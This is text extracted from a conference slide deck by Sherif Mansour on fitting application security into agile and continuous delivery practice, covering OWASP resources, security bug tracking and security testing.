Security in a Continuous Delivery World

Sherif Mansour

“Give me six hours to chop down a tree and I will spend the first four sharpening the axe.”

-Abraham Lincoln

Two things about Automation1. Automation applied to an efficient operation will magnify its efficiency

2. Automation applied to an inefficient operation will magnify its inefficiency

-Bill Gates

Two things about Web Programming

1. Control-C

2. Control-V

Two Things About World Conquest

1. Divide and Conquer.

2. Never invade Russia in the winter.

Two Things About Information Security

Complete: 1.

2.

Overview

• Timeline - 1986 • Agile Security

• Bug Tracker • Definition of Done • App Sec Radar

• Continuous Delivery • Security Testing

• How OWASP can help

Timeline - 1986

• HBR publishes an article: “The New New Product Development Game”

• Computer Fraud and Abuse Act

The New New Product Development GameLeading companies show six characteristics in managing their new product development processes:

1. Built-in instability

2. Self-organizing project teams

3. Overlapping development phases

4. “Multilearning”

5. Subtle control

6. Organizational transfer of learning

Agile Frameworks

• XP • Scrum • Crystal • FDD • Lean and Kanban • DSDM

Computer Fraud and Abuse Act

• Enacted in 1986 • First Felony in 1988 - Morris Worm • Mr. Robert Morris Sr. (his father) was the

Chief Scientist at NSA • Comm-Sec & Compu-Sec merged Info-

Sec • CERT was created in CMU

Since Then Its Been An Arms Race

Stop me of you have seen this beforeApplying controls without understanding its limitations.

Fast Forward to 2001

1.OWASP was formed :-)

2.Agile Manifesto was published :-) :-)

OWASP

• OWASP Top Ten • OWASP Software Assurance Maturity Model • OWASP Development Guide • OWASP ZAP Project: The Zed Attack Proxy

(ZAP)

Agile Manifesto

• Individuals and Interactions over processes and tools

• Working software over comprehensive documentation

• Customer collaboration over contract negotiation

• Responding to change over following a plan

Agile Principles

Agile (scrum) Framework

Security in an Agile Framework

• Communicate Security Recommendations simply and clearly

• Identify the biggest risk and which ones you teams are exposed to

• When you raise a security issue: • Unique - No duplicates • Useful - Improves the security and

quality of the software • Actionable - All necessary

information is in the ticket

App Sec Issues Tracking and MetricsFor every security issue detected raise a Jira bug ticket and include the following attributes to the bug type: 1. Business risk 2. Attack vector 3. Priority 4. Components 5. Testing Method 6. Dev Team

Metrics

App-Sec RadarThe Application Security Radar is a site in forms the technology teams on security technologies they should embrace or move away from.

This ensures developers adopt more secure technologies, there are 6 recommendation categories for the app sec radar: • Plan for Removal • No New Use • Evaluate • Trial • Adopt • Hold

DoD - Definition of Done

• Security should include a reference quick check list for developers on what to avoid, and what to look out for during code review.

Continuous Delivery

You’re doing continuous delivery when:

• Your software is deployable throughout its lifecycle • Your team prioritises keeping the software deployable

over working on new features • Anybody can get fast, automated feedback on the

production readiness of their systems any time somebody makes a change to them

• You can perform push-button deployments of any version of the software to any environment on demand

Release Vehicle vs. Pipeline

Testing in Continuous Delivery

How OWASP Can Help

• If you solve a problem and I solve a problem, each of us has two solutions. • Guidance • Security Libraries • Developer tools • Training • etc..

Thank you

Two More things :-)

Interests

• Headers reporting back: • Content Security Policy CSP • HTTP Public Key Pinning

• DMARC - (Email Standard)

Please Welcome Simon Bennetts